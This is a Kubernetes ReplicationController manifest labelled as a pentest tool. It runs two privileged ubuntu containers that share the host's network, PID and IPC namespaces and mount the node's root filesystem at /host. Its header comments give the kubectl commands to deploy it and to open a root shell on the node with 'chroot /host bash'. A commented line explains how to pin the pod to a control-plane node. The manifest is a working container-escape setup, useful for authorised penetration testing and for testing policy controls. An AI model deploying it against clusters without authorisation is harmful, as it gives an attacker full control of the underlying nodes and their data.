###########################################################
## Deploy:   kubectl apply -f everything-allowed-exec-replicationcontroller.yaml
## Find Pod: kubectl get pods | grep everything-allowed-exec-replicationcontroller 
## Access:   kubectl exec -it everything-allowed-exec-replicationcontroller-ID -- chroot /host bash
## Remove:   kubectl delete replicationcontroller everything-allowed-exec-replicationcontroller
###########################################################
apiVersion: v1
kind: ReplicationController
metadata:
  name: everything-allowed-exec-replicationcontroller
  labels:
    app: pentest
    type: replicationcontroller
spec:
  replicas: 2
  selector:
    app: pentest
    type: replicationcontroller
  template:
    metadata:
      labels:
        app: pentest
        type: replicationcontroller
    spec:
      hostNetwork: true
      hostPID: true
      hostIPC: true
      containers:
      - name: everything-allowed-exec-replicationcontroller
        image: ubuntu
        securityContext:
          privileged: true
        volumeMounts:
        - mountPath: /host
          name: noderoot
        command: [ "/bin/sh", "-c", "--" ]
        args: [ "while true; do sleep 30; done;" ]
      #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name
      volumes:
      - name: noderoot
        hostPath:
          path: /
      